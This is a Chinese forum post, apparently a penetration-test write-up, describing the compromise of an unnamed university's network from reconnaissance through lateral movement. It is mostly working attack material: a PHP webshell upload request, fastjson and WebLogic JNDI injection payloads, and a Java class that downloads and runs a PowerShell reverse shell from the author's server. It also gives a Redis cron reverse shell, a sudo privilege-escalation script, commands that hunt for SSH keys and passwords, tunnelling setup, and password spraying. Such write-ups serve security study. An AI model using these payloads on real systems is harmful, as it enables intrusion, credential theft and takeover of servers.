本帖最后由 chr 于 2024-6-22 16:07 编辑
信息收集打点[color=rgba(0, 0, 0, 0.9)]这个项目,拿到的目标是某某大学,而不是直接给的主域名或者IP啥的,所以需要我自己去对某某大学进行信息收集。 [color=rgba(0, 0, 0, 0.9)]关于信息收集,可能大多数师傅习惯fofa、hunter、quanke、去重一条龙。这里我细致讲解一下,一些忽略的细节。 [color=rgba(0, 0, 0, 0.9)]首先要尽可能的找到尽量齐全的资产,就要去收集该目标尽可能多的子域名,方式有以下方法。 [color=rgba(0, 0, 0, 0.9)]1.大家都不会忽略的直接是xxx.edu.cn [color=rgba(0, 0, 0, 0.9)]2.备案号查询子域名 [color=rgba(0, 0, 0, 0.9)]3.证书查询获取子域 [color=rgba(0, 0, 0, 0.9)]4.小蓝本查询获取子域 [color=rgba(0, 0, 0, 0.9)]5.去小程序搜一下相关目标可能会搜到小蓝本没有的子域(也可能是第三方) [color=rgba(0, 0, 0, 0.9)]以上是我认为比较齐全的搜子域名的方式。收集到子域名之后再进行fofa、hunter、quake一条龙。不过在使用quake的时候,可以加上cert也就是证书。hunter可以直接查备案。 外网渗透[color=rgba(0, 0, 0, 0.9)]在收集到了尽可能多资产之后,寻找一些有功能点的系统进行渗透。通常有注册、登陆功能的,asp的、php,springboot的,struct2的,thinkphp、laravel、爆过day的OA等这些系统会比较好打,容易getshell(因为以getshell为主,没有去挖其他未授权或者逻辑漏洞)。 [color=rgba(0, 0, 0, 0.9)]这里通过多不同系统的测试,外网getshell了三次,分别讲讲。 第一个getshell[color=rgba(0, 0, 0, 0.9)]第一个是laravel框架低版本文件上传Getshell,这个接口是我在简单js审计的过程中发现的 [color=rgba(0, 0, 0, 0.9)]数据包如下 POST /xxx/xxx/upload HTTP/2
Host: xxx.xxx.edu.cn
Xweb_xhr: 1
Accept-Language: zh-CN,zh;q=0.9
Accept: */*
Sec-Fetch-Mode: cors
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykriQeBZvkBfoslvY
Content-Length: 306
------WebKitFormBoundarykriQeBZvkBfoslvY
Content-Disposition: form-data; name="user"
test
------WebKitFormBoundarykriQeBZvkBfoslvY
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/jpeg
<?php
eval($_POST["ting"]);
------WebKitFormBoundarykriQeBZvkBfoslvY--
[color=rgba(0, 0, 0, 0.9)] [color=rgba(0, 0, 0, 0.9)]连接密码ting 成功获取服务器权限 [color=rgba(0, 0, 0, 0.9)] [color=rgba(0, 0, 0, 0.9)]但是由于当前获取的权限较低,又是第一台getshell,所以我尝试了进行提权,具体我放在内网渗透里。 [color=rgba(0, 0, 0, 0.9)]几经挫折,依然没有提权成功,虽然可以打内网了但是我还是想找找别的入口,说不定是别的内网网段的呢。 [color=rgba(0, 0, 0, 0.9)]浏览器访问的web站点测了一遍,包括需要登陆的没有前台漏洞的系统都测了一编。于是有第二次getshell。但是这个getshell也是跟之前的一样,用的laravel框架有个低版本的文件上传漏洞,接口名字都一样,估计是同一批开发人员,这里就不多截图了,提权也是一样没有成功。 第三次getshell[color=rgba(0, 0, 0, 0.9)]然后开始转向小程序了,搜索某某大学,看到几个小程序,直接开打。其中一个小程序,使用了fastjson,我的插件也提示我存在fastjso的JNDI注入漏洞经过检验确实存在该漏洞,复现过程如下。 [color=rgba(0, 0, 0, 0.9)]数据包 POST /xxx/xxx/getWeChatOpenId HTTP/1.1
Host: xxx.xxx.edu.cn
Content-Length: 160
Sec-Ch-Ua: "Not A(Brand";v="99", "Microsoft Edge";v="121", "Chromium";v="121"
Sec-Ch-Ua-Mobile: ?0
Systemsign: se-pc
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0
Content-Type: application/json;charset=UTF-8
Accept: */*
X-Requested-With: XMLHttpRequest
Token: null
Sec-Ch-Ua-Platform: "Windows"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://xxx.xxx.xxx.xx/Ting",
"autoCommit":true
}
[color=rgba(0, 0, 0, 0.9)]恶意服务器开启9999端口监听 收到了学校服务器的的请求,获取Ting.class这个恶意类(放在我的公网服务器上) [color=rgba(0, 0, 0, 0.9)] [color=rgba(0, 0, 0, 0.9)]然后web80端口也就监听到他请求Ting.class这个恶意类了 [color=rgba(0, 0, 0, 0.9)]恶意类Ting.java代码如下 commands里面可以写任意命令 然后调用Runtime类的exec方法执行任意命令 import java.lang.Runtime;
import java.lang.Process;
public class Ting {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"ping","klvmixrvls.dgrh3.cn"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
}
}
}[color=rgba(0, 0, 0, 0.9)]最终这里就执行了我们的命令 也就是ping klvmixrvls.dgrh3.cn 可以看到我们收到了服务器那边的请求 RCE->Getsehll[color=rgba(0, 0, 0, 0.9)]由于已经可以在服务器上执行任意命令了,尝试获取服务器命令行的权限 [color=rgba(0, 0, 0, 0.9)]首先在自己服务器开启监听 nc -lvp 8888[color=rgba(0, 0, 0, 0.9)]其实就是一个无文件落地,利用powershell 进行反弹shell,当然在这个情况下如果目标出网直接在公网挂该文件即可,如果不出网,可以通过拿下的另外一个内网shell,开一个http即可 [color=rgba(0, 0, 0, 0.9)]然后修改恶意类为如下代码 此时在我的服务器已经准备好了Invoke-PowerShellTcp.ps1文件 import java.lang.Runtime;
import java.lang.Process;
public class Ting {
static {
try {
Runtime rt = Runtime.getRuntime();
Process pc = Runtime.getRuntime().exec("powershell IEX (New-Object System.Net.Webclient).DownloadString('http://xxxxxxxxx/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress xxxxxx -port 8888");
pc.waitFor();
} catch (Exception e) {
}
}
}[color=rgba(0, 0, 0, 0.9)]依然发送如下数据包 POST /xxx/xxx/getxxxxx HTTP/1.1
Host: xxx.xxx.edu.cn
Content-Length: 160
Sec-Ch-Ua: "Not A(Brand";v="99", "Microsoft Edge";v="121", "Chromium";v="121"
Sec-Ch-Ua-Mobile: ?0
Systemsign: se-pc
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0
Content-Type: application/json;charset=UTF-8
Accept: */*
X-Requested-With: XMLHttpRequest
Token: null
Sec-Ch-Ua-Platform: "Windows"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://xxxxxx:9999/Ting",
"autoCommit":true
}
[color=rgba(0, 0, 0, 0.9)]查看http历史记录,可以看到先去获取了我的恶意类Ting.class并加载 加载恶意类的时候去执行powershell命令 下载Invoke-PowerShellTcp.ps1文件 [color=rgba(0, 0, 0, 0.9)]然后执行后面完整的命令反弹shell到我监听的服务器 成功获取服务器的shell 权限 [color=rgba(0, 0, 0, 0.9)] [color=rgba(0, 0, 0, 0.9)]这里已经获得三个shell了,两个linux,一个windows。这个时候应该先用哪个呢?当然是Linux,因为windows有杀软啊。 内网渗透Linux提权[color=rgba(0, 0, 0, 0.9)]在对linux进行提权的过程中,我当时用到的方法有这几个: [color=rgba(0, 0, 0, 0.9)]SUID提权 使用这三条命令任意一条即可 查看有哪些具有suid权限的命令 然后再看看有没有下面的几个可以提权的命令 find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
可以提权的命令通常有这些
Nmap、Vim、find、Bash、More、Less、Nano、cp[color=rgba(0, 0, 0, 0.9)]脏牛提权 受影响版本如下 Centos7 /RHEL7 3.10.0-957.36.3.el7
Cetnos6/RHEL6 2.6.32-642.6.2.el6
Ubuntu 16.10 4.8.0-26.28
Ubuntu 16.04 4.4.0-45.66
Ubuntu 14.04 3.13.0-100.147
Debian 8 3.16.36-1+deb8u2
Debian 7 3.2.82-1[color=rgba(0, 0, 0, 0.9)]内核漏洞提权 常见有这几种 [color=rgba(0, 0, 0, 0.9)]sudo缓冲区溢出提权(CVE-2021-3156) 要求sudo suid。 sudo: 1.8.2 - 1.8.31p2
sudo: 1.9.0 - 1.9.5p1
sudoedit -s / 判断漏洞是否存在
显示 sudoedit: /: not a regular file表示存在[color=rgba(0, 0, 0, 0.9)]sudo提权(CVE-2023-22809) echo "if ! sudo --version | head -1 | grep -qE '(1\.8.*|1\.9\.[0-9]1?(p[1-3])?|1\.9\.12p1)$'
then
echo "> Currently installed sudo version is not vulnerable"
exit 1
fi
EXPLOITABLE=$(sudo -l | grep -E "sudoedit|sudo -e" | grep -E '\(root\)|\(ALL\)|\(ALL : ALL\)' | grep -oP "sudoedit.*")
if [ -z "$EXPLOITABLE" ]; then
echo "> It doesn't seem that this user can run sudoedit as root"
read -p "Do you want to proceed anyway? (y/N): " confirm && [[ $confirm == [yY] ]] || exit 2
else
echo "> BINGO! User exploitable"
fi
echo "> Opening sudoers file, please add the following line to the file in order to do the privesc:"
echo "$USER ALL=(ALL:ALL) NOPASSWD:ALL"
read -n 1 -s -r -p "Press any key to continue..."
EDITOR="vim -- /etc/sudoers" $EXPLOITABLE
sudo su root
exit 0
" >> exp.sh[color=rgba(0, 0, 0, 0.9)]polkit提权 即pkexec提权(CVE-2021-4034)影响范围 不受影响版本
CentOS:
CentOS 6:polkit-0.96-11.el6_10.2
CentOS 7:polkit-0.112-26.el7_9.1
CentOS 8.0:polkit-0.115-13.el8_5.1
CentOS 8.2:polkit-0.115-11.el8_2.2
CentOS 8.4:polkit-0.115-11.el8_4.2
Ubuntu:
Ubuntu 14.04 ESM:policykit-1-0.105-4ubuntu3.14.04.6+esm1
Ubuntu 16.04 ESM:policykit-1-0.105-14.1ubuntu0.5+esm1
Ubuntu 18.04 LTS:policykit-1-0.105-20ubuntu0.18.04.6
Ubuntu 20.04 LTS:policykit-1-0.105-26ubuntu1.2
Ubuntu 21.10:policykit-1-0.105-31ubuntu0.1
Debain:
Debain stretch:policykit-1 0.105-18+deb9u2
Debain buster:policykit-1 0.105-25+deb10u1
Debain bullseye:policykit-1 0.105-31+deb11u1
Debain bookworm,bullseye:policykit-1 0.105-31.1
[color=rgba(0, 0, 0, 0.9)]通过以下命令查看版本 CentOS:
rpm -qa polkit
Ubuntu:
dpkg -l policykit-1[color=rgba(0, 0, 0, 0.9)]等等还有的不记得了。可以使用一些linux主机信息收集脚本,直接判断当前主机有哪些提权的方式,github是有相关项目的。 [color=rgba(0, 0, 0, 0.9)]出了提权以为肯定还有对linux主机的其他信息收集,我总结了这些命令 uname -a 打印所有可用的系统信息
uname -r 内核版本
uname -n 系统主机名。
uname -m 查看系统内核架构(64位/32位)
hostname 系统主机名
lsb_release -a 发行版信息
cat /proc/version 内核信息
cat /etc/*-release 发行版信息
cat /etc/issue 发行版信息
cat /proc/cpuinfo CPU信息
find / -type f -name "*.env" 搜索配置文件
查看历史命令
cat ~/.bash_history history
cat /etc/services查询存在的服务
cat /etc/services | grep Java 查询对应的服务
systemctl list-units --type=service --state=running 查询已经开启的服务
cat /etc/services 查看端口映射服务
查找ssh密钥
find / -name "id_dsa*" -o -name "id_rsa*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" 2>/dev/null |xargs -r ls
内网存货探测 不用上传工具
for i in 192.168.133.{1..254}; do if ping -c 3 -w 3 $i &>/dev/null; then echo $i is alived; fi; done
locate 快速定位文件
locate .php
find . -name "*.php" -print0 | xargs -0 grep -i -n "$password"
find / -name *.ini -exec grep -Hi password {} \; >2.txt[color=rgba(0, 0, 0, 0.9)]其中,在我拿到那两台linux之后,由于是php的,我找到了.env文件,这个文件存放的时候数据库账号密码,甚至小程序的appid appkey 有时候还会有ak/sk这些高危严重的信息。这里我就获取到了几个密码,也接管了数据库。 内网横向[color=rgba(0, 0, 0, 0.9)]然后我直接上传了一个不带免杀的fscan,linux的好处就是没有杀软,不用做免杀,反弹shell也很方便。直接fscan梭哈了一下,搞了几台ssh,几个redis未授权。然后redis未授权其中一个通过写入计划任务来反弹shell,路径为/var/spool/cron/ [color=rgba(0, 0, 0, 0.9)]NC开启监听等待 反弹shel [color=rgba(0, 0, 0, 0.9)] [color=rgba(0, 0, 0, 0.9)]成功反弹shell [color=rgba(0, 0, 0, 0.9)] [color=rgba(0, 0, 0, 0.9)]除了可以直接利用的漏洞以为还有很多的web服务,那么在打不动了的时候,就又要开始打内网的web了,这里主要找了一台双网卡的内网ip来打。 [color=rgba(0, 0, 0, 0.9)]师傅会问,我还没拿到他的权限,我就知道他是双网卡了? [color=rgba(0, 0, 0, 0.9)]那就是fscan的强大之处了,他在进行存货探测的时候,会使用似乎的ping,还是哪个服务的探测,就可以返回该主机的一些信息,有时候就会包括主机名,双网卡的话,还能获取不同网卡的两个IP。 [color=rgba(0, 0, 0, 0.9)]好了,开始打这个双网卡IP了,那么为了尽可能发现更多这个IP的脆弱点,我对其进行了全端口的扫描。然后为了更方便打内网,我肯定要正向代理搭建一下隧道嘛。 内网穿透[color=rgba(0, 0, 0, 0.9)]内网穿透的话我们也就需要搭建隧道了,关于隧道搭建,我想搭建必须要知道的是正向代理和反向代理,我以我自己的理解,以通俗的方式跟大家讲一下(语文不好)。 [color=rgba(0, 0, 0, 0.9)]正向代理:像reGeorg使用这种工具 在已知内网ip的情况下,通过内网中可以出网的服务器(已getshell的服务器)去访问内网ip的服务。 [color=rgba(0, 0, 0, 0.9)]通俗来讲:有一个代理服务器,可以让外面的客户端去访问 该代理服务器可以访问的局域网(内网),也就是VPN [color=rgba(0, 0, 0, 0.9)]反向代理:直接将内网的web服务器,例如80的web服务,映射到公网的81端口上,这样访问公网的81相当于访问内网那台不出网的客户端的80端口,是端口映射过去 [color=rgba(0, 0, 0, 0.9)]也就是nginx反代 [color=rgba(0, 0, 0, 0.9)]通俗来讲:内网的主动去代理到公网 [color=rgba(0, 0, 0, 0.9)]这里我们就拿两个linux中任意一台来搭建隧道即可。 隧道搭建[color=rgba(0, 0, 0, 0.9)]使用的Neo-reGeorg,reGeorg不行了,用不了咯 [color=rgba(0, 0, 0, 0.9)]执行命令生成 密码为ting的webshell python neoreg.py generate -k ting[color=rgba(0, 0, 0, 0.9)] [color=rgba(0, 0, 0, 0.9)]将webshell上传至目标服务器 [color=rgba(0, 0, 0, 0.9)] [color=rgba(0, 0, 0, 0.9)]配置代理转发的端口 python neoreg.py -k ting -u https://xxx.xxx.edu.cn//xxx//xxx//xx//xx//xx//tunnel.php -p 1080[color=rgba(0, 0, 0, 0.9)]配置 proxifiler 代理 如图代理成功 [color=rgba(0, 0, 0, 0.9)] [color=rgba(0, 0, 0, 0.9)]配置代理规则 之后所有浏览器的流量将会转发至 1080端口,然后转发给目标服务器上 就看将目标服务器当作跳板访问内网其他web服务获取其他主机的其他服务了 [color=rgba(0, 0, 0, 0.9)] [color=rgba(0, 0, 0, 0.9)]好了这个时候就可以继续打这个双网卡IP,或者内网其他IP的WEB服务了。端口扫描发现7003端口,一看就是weblogic,因为weblogic常见端口就是7001/7002/7003,这里先尝试他出网的情况,也就是在公网服务器部署ldap服务 [color=rgba(0, 0, 0, 0.9)]公网服务器开启监听 提供ldap服务 [color=rgba(0, 0, 0, 0.9)] [color=rgba(0, 0, 0, 0.9)]公网服务器开启NC监听 反弹的shell [color=rgba(0, 0, 0, 0.9)] [color=rgba(0, 0, 0, 0.9)]本机使用poc对目标今天JNDI请求 java -jar Weblogic-CVE-2023-21839.jar xxxxxxx:7003 ldap://xxxxxxxx:1389/Basic/ReverseShell/xxxxxx/6666[color=rgba(0, 0, 0, 0.9)] [color=rgba(0, 0, 0, 0.9)]目标回去请求公网服务区的恶意服务 反弹shell到公网服务器 getshell [color=rgba(0, 0, 0, 0.9)] [color=rgba(0, 0, 0, 0.9)]拿下双网卡先别太高兴,看看是不是“真”的双网卡,因为有的主机第二个网卡,就那一个IP,老规矩上传fscan,好家伙存活IP有点多,当时没截图,看来是真的了。 [color=rgba(0, 0, 0, 0.9)]有所收获之后,继续打web,遇到一个spring报错页面,扫了一下目录,扫出来个api文档,测试一下接口 大丰收啊 这个接口直接爆了几十个数据库的账号密码 大量注意一下滚动条就完事了,这下收集了一堆密码,发现连数据库密码也有复用的情况,接下来也就是喷洒咯 [color=rgba(0, 0, 0, 0.9)] [color=rgba(0, 0, 0, 0.9)]收集大量密码之后,进行喷洒,注意一个ip爆破次数不能过度,否则安全设备会报警还会阻止爆破,也就是即使后面密码对了也会显示失败。除了喷洒之后还是对内网其他web进行了测试最终也是收获了颇丰啊就不一一展示了。getshell的有这些(实际上不止这些懒得批图了,包括对那台windows的lassm dump后面过程也不详细说了,太漫长了)。 [color=rgba(0, 0, 0, 0.9)]
|
发表于 2024-6-22 16:07:07